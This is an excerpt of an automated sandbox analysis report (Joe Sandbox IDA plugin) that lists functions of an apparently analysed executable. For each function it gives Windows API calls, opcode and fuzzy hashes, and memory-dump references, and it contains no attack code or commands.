Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8cb571667bacb5b186d1a20c7d8c4930e5a5741e2658102c78b0d06b8c95d20
Instruction ID: 35467fe4c85541fb13498bd192e1d81f468a7c50231f58e1988f69f9e392550e
Opcode Fuzzy Hash: b8cb571667bacb5b186d1a20c7d8c4930e5a5741e2658102c78b0d06b8c95d20
Instruction Fuzzy Hash: 9031D972900219AFDB20DEBCCC94DABB7BDEB84218F144199F94597248EA34EE408B50

Function 0100C842 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 0100C9D0

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: da6193d8d894350c2ac9c5b9649061874cdf6592ee2b3482cf461989fc2fbd94
Instruction ID: f3ce5065a2f273d9af22c2417187e9931972f6f345e3192ea3234b6445abc7c7
Opcode Fuzzy Hash: da6193d8d894350c2ac9c5b9649061874cdf6592ee2b3482cf461989fc2fbd94
Instruction Fuzzy Hash: 93C1DE30900A068FFB6ACF6CC6846BEBBE1AF05314F1447DAD5D69B2D1C730A985CB95

Function 0101C43D Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 01014C01: GetLastError.KERNEL32(?,00000008,010191D2), ref: 01014C05
Part of subcall function 01014C01: SetLastError.KERNEL32(00000000,0102B440,00000024,01010169), ref: 01014CA7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0101C491

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 8258c3356d84d3351704da787f50f18e645c228062e57013b9e380ce75d22912
Instruction ID: d08b201ddc4f6cb8e716e80c9524f63343a7555b00bcb9e2240fb138e4d3d16f
Opcode Fuzzy Hash: 8258c3356d84d3351704da787f50f18e645c228062e57013b9e380ce75d22912
Instruction Fuzzy Hash: 5921C572694206ABFB289A68CD41EBA77E8EF44314F1040BDED42D7149EF3DE940DB50

Function 0101C0C4 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01014C01: GetLastError.KERNEL32(?,00000008,010191D2), ref: 01014C05
Part of subcall function 01014C01: SetLastError.KERNEL32(00000000,0102B440,00000024,01010169), ref: 01014CA7

EnumSystemLocalesW.KERNEL32(0101C1EA,00000001,00000000,?,-00000050,?,0101C81B,00000000,?,?,?,00000055,?), ref: 0101C136

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f9b8cd4e71a690293db6bf2e2d47eafc0ba7567c520f4accea11d7fcb7c1005f
Instruction ID: f5638bdbab5395138c85e20a4c373fdc4eed5eeb05d4ce5b240b798d6e72c620
Opcode Fuzzy Hash: f9b8cd4e71a690293db6bf2e2d47eafc0ba7567c520f4accea11d7fcb7c1005f
Instruction Fuzzy Hash: EA11293B2403055FEB189F79C9A15BABBE2FF81318B14442DE98787B40D379B942C740

Function 0101C66C Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 01014C01: GetLastError.KERNEL32(?,00000008,010191D2), ref: 01014C05
Part of subcall function 01014C01: SetLastError.KERNEL32(00000000,0102B440,00000024,01010169), ref: 01014CA7

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0101C406,00000000,00000000,?), ref: 0101C698

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 599b66fc8c5a46cf062f0b3cfc41540d25462088d2acef030de5972417fb37f6
Instruction ID: d2df78d2719b9fe12f3a8550f7b0e3695a4d03460d810809d0bfc4c9e936a08b
Opcode Fuzzy Hash: 599b66fc8c5a46cf062f0b3cfc41540d25462088d2acef030de5972417fb37f6
Instruction Fuzzy Hash: 59F02D32780112BBFB645A68C905BFE7BA4EF44754F040C65EDC6A3184EA7CFE41C690

Function 0101C15F Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01014C01: GetLastError.KERNEL32(?,00000008,010191D2), ref: 01014C05
Part of subcall function 01014C01: SetLastError.KERNEL32(00000000,0102B440,00000024,01010169), ref: 01014CA7

EnumSystemLocalesW.KERNEL32(0101C43D,00000001,?,?,-00000050,?,0101C7DF,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0101C1A9

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f9046fb10591599cc5781317165987c4b3136f232981e6f8f266250047876edf
Instruction ID: 2229856611547584e4d720c17475e0f3ee57ebc5bfd27efdfa0d6bed38484999
Opcode Fuzzy Hash: f9046fb10591599cc5781317165987c4b3136f232981e6f8f266250047876edf
Instruction Fuzzy Hash: 54F046362803046FEB245F399D80A7A7BE1FF81328F04406DFA858B684C67AEC02CB10

Function 01015ACF Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0100DB11: EnterCriticalSection.KERNEL32(?,?,010148D9,?,0102B2A0,00000008,01014A9D,?,0100C196,?), ref: 0100DB20

EnumSystemLocalesW.KERNEL32(01015AC2,00000001,0102B360,0000000C,01015E75,00000000), ref: 01015B07

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 6d735c604bb325fb5171a2288e7bc5f2e5520a5bd0dd036b7b3c5d44a8e1ab04
Instruction ID: 04709814cff701a9a47f090e172ccbcdf375e5dd6fb208c1f31aa6637cc7a15b
Opcode Fuzzy Hash: 6d735c604bb325fb5171a2288e7bc5f2e5520a5bd0dd036b7b3c5d44a8e1ab04
Instruction Fuzzy Hash: B0F03772A40205EFE720EF98E882B9D77B0FB59720F10412AE5949B2D4CA7E5940CB50

Function 0101C079 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01014C01: GetLastError.KERNEL32(?,00000008,010191D2), ref: 01014C05
Part of subcall function 01014C01: SetLastError.KERNEL32(00000000,0102B440,00000024,01010169), ref: 01014CA7

EnumSystemLocalesW.KERNEL32(0101BFD2,00000001,?,?,?,0101C83D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0101C0B0

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 280599f97a3a9a460aef24af9cbe95ab7252668cc55fdcbab95309625b7c05b0
Instruction ID: 8b425cb7abc9573f8d18b6824889694b7e63b1632339dae53441105f30ac31c5
Opcode Fuzzy Hash: 280599f97a3a9a460aef24af9cbe95ab7252668cc55fdcbab95309625b7c05b0
Instruction Fuzzy Hash: 77F0553A30020957CB159F39C84466ABFE0EFC2724B06409CFA458B285C63AD842C790

Function 01015F79 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,01012100,?,20001004,00000000,00000002,?,?,01011700), ref: 01015FAD

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b2fcc8a3384784e046850700830f77cbfcfe41b9d59e0ea9ee0a683f0edc7239
Instruction ID: 5a4c95edb5db4635d6b6f83b8387d9578a344d6e8545c2e95b29f3793040a048
Opcode Fuzzy Hash: b2fcc8a3384784e046850700830f77cbfcfe41b9d59e0ea9ee0a683f0edc7239
Instruction Fuzzy Hash: F5E04F36504128BBCF222F61EC04EDE7E26EF85760F544014FD856A169CB7A8D219B95

Function 010077FF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000780B,01006B10), ref: 01007804

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 02daa711e18950426f6f50788f95c5b1e58130f069c117cd82f645b8e7cbb652
Instruction ID: 1253925e1d7ba18e691db47a9d931a9a0c562a613e96341e095d569709ed415c
Opcode Fuzzy Hash: 02daa711e18950426f6f50788f95c5b1e58130f069c117cd82f645b8e7cbb652
Instruction Fuzzy Hash:

Function 01001D65 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Z81xbyuAua, xrefs: 01001E87

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Z81xbyuAua
API String ID: 0-3121583705
Opcode ID: 438b16d6421c3db4ddd335cbf34ab76abc28d82eec487420886d30c5d6bd21bd
Instruction ID: dc80b53e541403fa69eb76eda703b0daf4fabbfab263bd5972ce3e1bda4c666b
Opcode Fuzzy Hash: 438b16d6421c3db4ddd335cbf34ab76abc28d82eec487420886d30c5d6bd21bd
Instruction Fuzzy Hash: EC41FA76E1062B5BEB4DEEB8C4450AEBBA9E755360F04427ADE51DB3D1E230CA0186D0

Function 0101C99D Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0101C99D

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 2787f47a45051f1f58c72073d3fb09f70414365e59b469cfe746b3bdd322a844
Instruction ID: 7514ad951f14f3fda45fec5d4d200edaf57134f589d81ded9bf65ec35ccbabed
Opcode Fuzzy Hash: 2787f47a45051f1f58c72073d3fb09f70414365e59b469cfe746b3bdd322a844
Instruction Fuzzy Hash: 8DA022B0302200CF8330CF30E30B30C3AECAA00AC03280028E2CCC0088FB3E80A08B23

Function 01058D2E Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 640bf8eae2d78ad77c4c4812c82337757702f6639c51110261f3c9d00c87b92d
Instruction ID: e17dba86e69fcee8ccd7423bf8d8974eb4367798d77c2cafe5a864f19a9ae7ba
Opcode Fuzzy Hash: 640bf8eae2d78ad77c4c4812c82337757702f6639c51110261f3c9d00c87b92d
Instruction Fuzzy Hash: 18028133D496B28B8BF24EBD489422B7FE15E0269430F86D9DED03F197C212ED1596E4

Function 01059D1B Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 815063ebf518a18b241fdc08e8bd413dc506e0a143f3ec961381d4fc2415a200
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: A4C18173D1A5B2858BF6462D481823FFEE36E82A4431FC3D9DDD03F28AC6266D1196D4

Function 01059933 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 108975d3dcc6c43f338bcac8fd5c3ecf5ce3223a27a9bbc0a1492c9fb2acbc38
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: B0C17073D0E5B3859BF6452D095823FFEE26E82A4831F83D9DDD03F28AC2266D1586D4

Function 01059561 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: acdbe19e106feafa3a68c6e3ab3b1d5e3173f6e3ba8f4df79c90f3410910aa60
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 66C18673D0E5B2859BF6462D081823FFEE26E82A4931FC3D9CDD03F28AC2166D0586D4

Function 0101B888 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 3471368781-0
Opcode ID: 522bf39c82bd6357d6cd13cbebe249e2a640a006a76c2157dfa8f8b0da125227
Instruction ID: 78db4d3efb75e7b1478eff67d5026c9615cbc38809c9078668f590e570faffff
Opcode Fuzzy Hash: 522bf39c82bd6357d6cd13cbebe249e2a640a006a76c2157dfa8f8b0da125227
Instruction Fuzzy Hash: 79B1E5355007069BDB39AF29CCD1AB7B3F9FB44308F4445ADE9C2C6588EBB9A545CB10

Function 010591C3 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: b9ba12a4daef91ecea1dfc4db5668f7c394effd9565e52698f23a70a1cb1cb29
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 6DB17233D0E5B2859BF6452D445823FFEE26E82A4831FC3D9DDD03F28AC626AD1596D0

Function 01047705 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
Instruction ID: 7454f291a624e77886bc6de79b935cc769cf8c6bfb6018b2ba0ef375a83ae9bb
Opcode Fuzzy Hash: f820d73acb58f4ea73768fd8ccb48802642c53090ea72760e35e0388eb771fac
Instruction Fuzzy Hash: 1D21A8216B0AE306CB858FF8FCC011277D1DB8D11B79EC6B9CE94C9167D16DA6628590

Function 0102D38D Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

